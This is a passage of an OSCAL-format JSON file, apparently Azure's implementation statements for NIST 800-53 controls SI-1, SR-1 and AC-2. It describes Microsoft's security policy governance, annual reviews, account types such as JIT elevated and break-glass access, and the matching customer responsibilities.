statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6c91c4ed-627a-4de6-b161-8023ecfc1ae4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-1","statements":[{"uuid":"e0069d02-a75c-4bdb-b34c-f4b1b926e00f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-1_smt.a","by-components":[{"uuid":"1a932319-c03d-4875-91db-87f1345328b1","export":{"provided":[{"uuid":"14cda4b6-ee00-4b29-969f-cb29540d0c9e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-001"}],"description":"Azure addresses the system and information integrity policy as part of the 
Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Asset handling * Logging and monitoring Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with system and information integrity are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Asset Classification Standard, the Asset Protection Standard, and the Azure Network Security SOP implement the system and information integrity policy and associated controls and document the following procedures: * Network access control * Routing control * Boundary protection"}],"responsibilities":[{"uuid":"c966bc19-12eb-4c27-a59a-bc23b7d6790a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-001"}],"description":"The customer is responsible for developing, documenting, and disseminating system and information integrity policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. 
\nThe customer is responsible for procedures to facilitate the implementation of the system and information integrity policy and the associated system and information integrity controls.","provided-uuid":"14cda4b6-ee00-4b29-969f-cb29540d0c9e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9d5d3974-6b53-44b5-9491-2d57153b892b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-1_smt.b","by-components":[{"uuid":"97b4eb7b-9db4-463c-855c-9a49fc574acc","export":{"provided":[{"uuid":"b778bb18-09ed-4d11-ad8f-0a01e9f95510","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. 
The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"d278013a-c505-4b16-bbfd-3a6f94a1cd81","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of system and information integrity policy and procedures.","provided-uuid":"b778bb18-09ed-4d11-ad8f-0a01e9f95510"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2b30c51a-4501-4ff8-8d6e-1bdc7ae6dc28","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-1_smt.c","by-components":[{"uuid":"d7cc6a6c-b310-4917-9f36-9807ca2c2a4d","export":{"provided":[{"uuid":"a240ff15-e0ba-4f68-9574-4acba7d34f89","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-004"}],"description":"The Azure team updates the Azure SOPs at least annually 
through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"02e07e42-fc72-48a4-96c2-edec9242cf2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-004"}],"description":"The customer is responsible for reviewing and updating the current system and information integrity policy on a regular basis and following organization defined events.","provided-uuid":"a240ff15-e0ba-4f68-9574-4acba7d34f89"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"17f9b270-79e2-4cd6-ac75-4c4f71ee218e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-1","statements":[{"uuid":"22b7a970-a427-4683-b8fa-b883b9ac4265","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-001"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-1_smt.a","by-components":[{"uuid":"3b8c9a41-ed5e-4b72-a0d2-125dc9a58af1","export":{"provided":[{"uuid":"405f0d66-5c1a-4df2-a54a-85574833c72e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-001"}],"description":"Azure addresses the supply chain risk management policy as part of the Microsoft security policies, of which there are two 
sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following:\n* Ownership of third-party relationships\n* Security Development Lifecycle (SDL)\n* Introduction of new hardware, software, or services\n\nAdditionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with access control are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Access Control Standard Operating Procedure (SOP) implements the access control policy and associated controls and documents the following procedures:\n* Provisioning of Access\n* Modification and Review of Access Rights\n* Privilege Management\n* Inactive User Account Review\n* Separation of Duties\n* Remote Access Mechanisms\n* Session Control Parameters"}],"responsibilities":[{"uuid":"d66813b3-1629-4841-b85a-e3e3dac0ec06","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-001"}],"description":"The customer is responsible for developing, documenting, and disseminating supply chain risk management policy and procedures that address purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and are consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. 
\nThe customer is responsible for procedures to facilitate the implementation of the access control policy and procedures and the associated access controls.","provided-uuid":"405f0d66-5c1a-4df2-a54a-85574833c72e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ad94d67e-9923-4bce-bd50-ac1fe7b595ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-003"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-1_smt.b","by-components":[{"uuid":"811c5479-d399-464d-8c16-77f0b81e6838","export":{"provided":[{"uuid":"bdc11591-022a-4ea9-9f24-a5210ddb792d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. 
Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"6c427b33-7994-4527-82f0-ccfb98ed072e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the access control policy and procedures.","provided-uuid":"bdc11591-022a-4ea9-9f24-a5210ddb792d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"866bbaca-09d7-43b8-8974-9a134c1c6c5b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-004"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-1_smt.c","by-components":[{"uuid":"39a8db72-81ad-44e9-9568-887301113fd8","export":{"provided":[{"uuid":"8e334277-46cc-4cf7-9501-7fba1db3e09a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"ec1b21e1-a7e3-43b9-9013-a2612d4fb163","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-004"}],"description":"The customer is responsible for reviewing and updating the current access control policy on a regular basis and following organization defined events. The customer is responsible for reviewing and updating the current access control procedures on a regular basis and following organization defined events.","provided-uuid":"8e334277-46cc-4cf7-9501-7fba1db3e09a"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bbc0ac6c-4447-40d1-ab54-4278e76f9a01","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2","statements":[{"uuid":"7dbdf99a-805f-48f5-8e96-056fc9053e4e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.a","by-components":[{"uuid":"2c4f68b2-d297-426d-b195-59a63271d263","export":{"provided":[{"uuid":"dde8d5cd-af55-4141-b19c-3cf34aa3fc3b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-006"}],"description":"Azure accounts are only provided to Microsoft personnel supporting Azure services. Accounts with permissions to internal Azure assets and resources are not provisioned to customers. Azure uses Active Directory (AD) to manage access to implement Role-Based Access Control (RBAC) using AD groups. Microsoft personnel are assigned unique corporate network (CorpNet) AD accounts as part of a standard onboarding to Microsoft. These CorpNet accounts, known as a user's alias, do not have access to any Azure domains by default. For personnel supporting Azure services, a user account within each Azure domain ties to the user's CorpNet account using his or her unique CorpNet alias. This alias is consistent across all a user's accounts in all Microsoft domains, including Azure. CorpNet and Azure access are provisioned and managed using separate account management tools. 
Azure utilizes OneIdentity for both identifier and security group management. Azure utilizes the Global Management Environment (GME) and Azure Management Environment (AME) domains for access to Azure. Each domain is specific to the environment. As an example, John Doe's alias is jdoe, with accounts jdoe@redmond.gbl for access to CorpNet and jdoe@ame.gbl for access to Azure Commercial. Below are the different account types that Azure utilizes.\n\nStandard Access\nAll personnel with standard access to Azure are granted system metadata read access used for regular troubleshooting, release management, and other maintenance and monitoring activities. Standard access provides permissions to key Azure tools, services, SharePoint sites, documentation, and a variety of dashboards. For instance, a user with standard access may have the need to review service-specific logs within Azure to identify and diagnose issues. These accounts are considered unprivileged due to the lack of write access. Any additional permissions above standard access require elevation of access via the Azure Just in Time (JIT) tool, described below.\n\nElevated Access\nAll personnel must use JIT when interactive elevated access is required in the Azure production environment. Except in the case of an approved exception as described below, there is no standing or persistent elevated access to the Azure production environment. The primary exception is emergency elevated access, described below. In scenarios where JIT does not yet support management of elevated access, standing access may exist; these gaps in JIT support are identified and tracked as an exception, which requires approval. Software deployment via automated means (i.e., not using an interactive login) does not require interactive login to a resource that is accessed via JIT. In this case, a service team member submits a job (e.g., Pull Request in Azure DevOps), and another team member reviews, approves, and then the safe deployment system deploys. 
\n\nElevated Access - Emergency Access\nAzure maintains emergency access accounts with elevated access for use in the scenario that the JIT service is not available. These accounts have persistent elevated access to perform maintenance activities if JIT is unable to provide temporary elevated access. These accounts are carefully managed, only to be used in emergencies, and have notifications associated with their use. Whenever such an account is utilized, a Severity 2 incident ticket is generated that requires the service that owns the resource to investigate and determine whether the access is valid.\n\nNetwork Device Accounts\nAccess to network devices is managed through the Authentication, Authorization, and Accounting (AAA) system, which is configured to allow a specific role-based level of access to Azure Networking network devices via specific AD security groups managed by Azure Networking. There are no user accounts or groups configured in the AAA system, as account and security group access is managed and inherited from the Active Directory infrastructure, with AAA acting as its own directory for the leveraged accounts. The AAA system provides automated mechanisms to support accounts in use for network device access, including integration with network devices for administration access control, and allows for centralized control and auditing of administrative actions in the environment.\n\nService Accounts\nNon-user, non-interactive service accounts are used to run relevant services. Service accounts are not used for interactive logins. For example, software deployment via automated means does not require interactive login to a resource that would normally be accessed via JIT. In this example, a service team member submits a job, such as a Pull Request in Azure DevOps, and another team member reviews and approves, at which point the Azure Safe Deployment Practices (SDP) automatically deploys. 
\n\nGroup, Anonymous, and Temporary Accounts\nGroup or shared accounts are not utilized within Azure unless necessary, where a local account cannot be deleted or disabled or is necessary for emergency access. For accounts tracked as approved exceptions, the credentials are stored in an approved secret management store, which tracks and monitors access to the credentials and ensures group or shared account usage is uniquely attributable to the user accessing it. This is accomplished by associating the secret store logs with the group or shared account usage. When a user accesses the credentials in the secret management store, that user is uniquely identified, ensuring non-repudiation and attributing user activity to the shared account.\n\nAzure accounts are only provided to Microsoft personnel supporting Azure services. Accounts with permissions to internal Azure assets and resources are not provisioned to customers. Azure uses Active Directory (AD) to manage access to implement Role-Based Access Control (RBAC) using AD groups. Microsoft personnel are assigned unique corporate network (CorpNet) AD accounts as part of a standard onboarding to Microsoft. These CorpNet accounts, known as a user's alias, do not have access to any Azure domains by default. For personnel supporting Azure services, a user account within each Azure domain ties to the user's CorpNet account using his or her unique CorpNet alias. This alias is consistent across all a user's accounts in all Microsoft domains, including Azure. CorpNet and Azure access are provisioned and managed using separate account management tools. Azure utilizes OneIdentity for both identifier and security group management. Azure utilizes the Global Management Environment (GME) and Azure Management Environment (AME) domains for access to Azure. Each domain is specific to the environment. As an example, John Doe's alias is jdoe, with accounts jdoe@redmond.com for access to CorpNet and jdoe@ame.gbl for access to Azure Commercial. 
Below are the different account types that Azure utilizes.\n\nStandard Access\nAll personnel with standard access to Azure are granted system metadata read access used for regular troubleshooting, release management, and other maintenance and monitoring activities. Standard access provides permissions to key Azure tools, services, SharePoint sites, documentation, and a variety of dashboards. For instance, a user with standard access may have the need to review service-specific logs within Azure to identify and diagnose issues. These accounts are considered unprivileged due to the lack of write access. Any additional permissions above standard access require elevation of access via the Azure Just in Time (JIT) tool, described below.\n\nElevated Access\nAll personnel must use JIT when interactive elevated access is required in the Azure production environment. Except in the case of an approved exception as described below, there is no standing or persistent elevated access to the Azure production environment. The primary exception is Break-Glass elevated access, described below. In scenarios where JIT does not yet support management of elevated access, standing access may exist; these gaps in JIT support are identified and tracked as an exception, which requires approval. Software deployment via automated means (i.e., not using an interactive login) does not require interactive login to a resource that is accessed via JIT. In this case, a service team member submits a job (e.g., Pull Request in Azure DevOps), and another team member reviews, approves, and then the safe deployment system deploys.\n\nElevated Access - Break-Glass Access\nAzure maintains Break-Glass accounts with elevated access for use in the scenario that the JIT service is not available. These accounts have persistent elevated access to perform maintenance activities if JIT is unable to provide temporary elevated access. 
These accounts are carefully managed, only to be used in emergencies, and have notifications associated with their use. Whenever such an account is utilized, a Severity 2 incident ticket is generated that requires the service that owns the resource to investigate and determine whether the access is valid.\n\nNetwork Device Accounts\nAccess to network devices is managed through the Authentication, Authorization, and Accounting (AAA) system, which is configured to allow a specific role-based level of access to Azure Networking network devices via specific AD security groups managed by Azure Networking. There are no user accounts or groups configured in the AAA system, as account and security group access is managed and inherited from the Active Directory infrastructure, with AAA acting as its own directory for the leveraged accounts. The AAA system provides automated mechanisms to support accounts in use for network device access, including integration with network devices for administration access control, and allows for centralized control and auditing of administrative actions in the environment. For privileged access, a JIT request is required which grants Read Write (RW) access.\n\nService Accounts\nNon-user, non-interactive service accounts are used to run relevant services. Service accounts are not used for interactive logins. For example, software deployment via automated means does not require interactive login to a resource that would normally be accessed via JIT. In this example, a service team member submits a job, such as a Pull Request in Azure DevOps, and another team member reviews and approves, at which point the Azure Safe Deployment Practices (SDP) automatically deploys.\n\nGroup, Anonymous, and Temporary Accounts\nGroup or shared accounts are not utilized within Azure unless necessary, where a local account cannot be deleted or disabled or is necessary for Break-Glass access. 
For accounts tracked as approved exceptions, the credentials are stored in an approved secret management store, which tracks and monitors access to the credentials and ensures group or shared account usage is uniquely attributable to the user accessing it. This is accomplished by associating the secret store logs with the group or shared account usage. When a user accesses the credentials in the secret management store, that user is uniquely identified, ensuring non-repudiation and attributing user activity to the shared account."}],"responsibilities":[{"uuid":"58d9a4b1-f732-4ce5-9867-cb0f62c5f558","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-006"}],"description":"The customer is responsible for defining and documenting all customer-controlled account types and accounts within the system. Customers configure Azure through either the Azure Management Portal or the Service Management API (SMAPI). These methods allow customers to create, modify, remove, and monitor storage accounts, hosted services, tenants, roles, and role instances within their subscription.","provided-uuid":"dde8d5cd-af55-4141-b19c-3cf34aa3fc3b"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fadb0706-5330-4f13-89e8-acf0edb4c1f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.b","by-components":[{"uuid":"587e4089-bcd7-40eb-aa5d-0b3a00c2e571","export":{"provided":[{"uuid":"9650f36d-6991-4712-aee8-fedea42108bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-007"}],"description":"All account approvals for Azure go through OneIdentity. All security groups have a primary and secondary owner identified. When a user submits a request, these approvers receive a notification to approve or deny."}],"responsibilities":[{"uuid":"c3f5f248-d5b2-44bf-bb1e-b1e1d678bb43","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-007"}],"description":"The customer is responsible for assigning managers to the accounts identified in AC-02 Part a.","provided-uuid":"9650f36d-6991-4712-aee8-fedea42108bc"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"49204de1-8731-42b0-a0dd-1f09349c1d5d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.c","by-components":[{"uuid":"022942a7-5d80-4894-a722-1d1600320df1","export":{"provided":[{"uuid":"b18925d3-584c-4c66-809e-abbe7b1db5b7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-008"}],"description":"When an Azure user requests access to any security group, the request is approved by the owner of the group based on the criteria defined for membership. Azure has certain environment-wide conditions, such as screening and training completion, that are met before receiving any Azure account. Additional conditions and criteria are established by the service team. 
All conditions are enforced by OneIdentity."}],"responsibilities":[{"uuid":"aad13778-0348-485f-90f0-3d906848f134","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-008"}],"description":"The customer is responsible for establishing role and group membership criteria for customer-controlled account types.","provided-uuid":"b18925d3-584c-4c66-809e-abbe7b1db5b7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"14157742-a8d5-4f96-ae26-e77fe5f83a98","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.d","by-components":[{"uuid":"20dd5b9d-1583-4848-abf9-ef4496b01896","export":{"provided":[{"uuid":"b6640c6d-5035-4ff2-91b2-5d998e5feab6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-009"}],"description":"The Azure service team's management identifies service team personnel who should be given authorization to access the system and specifies the type of privilege each service team personnel should have based on their role. Azure utilizes Role-Based Access Control (RBAC) to identify and control the access privileges of each service team user in accordance with OneIdentity restrictions. Access privileges vary depending on the role a specified service team member assumes within the service team. 
Access privileges are defined by the service teams in OneIdentity and enforced by Active Directory."}],"responsibilities":[{"uuid":"9fd4abc1-0ea2-44fc-84fd-06804a528f56","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-009"}],"description":"The customer is responsible for establishing role and group membership criteria for customer-controlled account types.","provided-uuid":"b6640c6d-5035-4ff2-91b2-5d998e5feab6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"eb7e7864-eb6f-4907-86f2-685999d272c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.e","by-components":[{"uuid":"5b72f1b9-8eb7-40af-9455-b2e5561e2afa","export":{"provided":[{"uuid":"dc386a66-ac50-45ba-8932-deb0ac15d5bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-010"}],"description":"All account approvals in Azure, including establishing user accounts, security groups, and service accounts, go through OneIdentity. No access is possible without an approved account. When a user submits a request, the approver identified in AC-02 Part c receives an email notification. Approvers may also go directly to the tool to view a request. The approver follows these steps to approve or deny the request ticket and determine the level of user access:\n* The approver determines whether the business justification is sufficient.\n* The approver determines whether the level of user access requested is appropriate.\n
The approver adheres to the principles of least privilege and separation of duties when approving and assigning user access rights and can reject or modify the requested permissions if they are not appropriate. In the case of access requests to multiple services, this may translate into different levels of permissions against the different services to which the user needs access."}],"responsibilities":[{"uuid":"0859e482-8746-48c2-ae5f-defa7d1fb309","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-010"}],"description":"The customer is responsible for requiring personnel to approve the creation of new accounts for the system.","provided-uuid":"dc386a66-ac50-45ba-8932-deb0ac15d5bc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"14b11511-1821-46e1-a5c9-ac09039e10e7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.f","by-components":[{"uuid":"06f518aa-1778-442f-99a1-60cfd5a2b8db","export":{"provided":[{"uuid":"1e323e41-f0d4-4034-ba3b-b2b47a483873","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-011"}],"description":"Azure personnel are assigned unique corporate network (CorpNet) Active Directory (AD) accounts by Core Services Engineering and Operations (CSEO) as part of a standard onboarding to Microsoft. 
All Azure access requests and approvals leverage these CorpNet identifiers and are managed through OneIdentity, which is an automated workflow management tool that tracks the process for account request, approval, creation, modification, and deletion. New user accounts refer to accounts of existing Microsoft users using their unique CorpNet identifiers, known as aliases, who require access to Azure resources.\n\nStandard Access permits authorized users persistent access to a service's documentation, work items, source code, telemetry, reports, and KPIs, and to submit and/or process deployment jobs using dual-key. Service team approvers create, enable, modify, disable, and remove this access using OneIdentity. Elevated access to the Azure production environment is primarily either dual-key (one user submits, another reviews and approves or rejects) for automation or uses Just In Time (JIT) approvals for interactive user access. JIT provides personnel elevated access for a defined period to resolve live site or deployment incidents. Azure has automated the JIT access request process through the JIT portal by defining policies for access provisioning and revocation. Service teams must define a JIT policy indicating which users may request JIT elevation, the duration of that elevation, and the scope of elevation. The default duration is eight (8) hours, with a maximum of seven (7) days. JIT policy changes are dual-key. The user initiates the access request by logging into the JIT portal and submitting the JIT access request. 
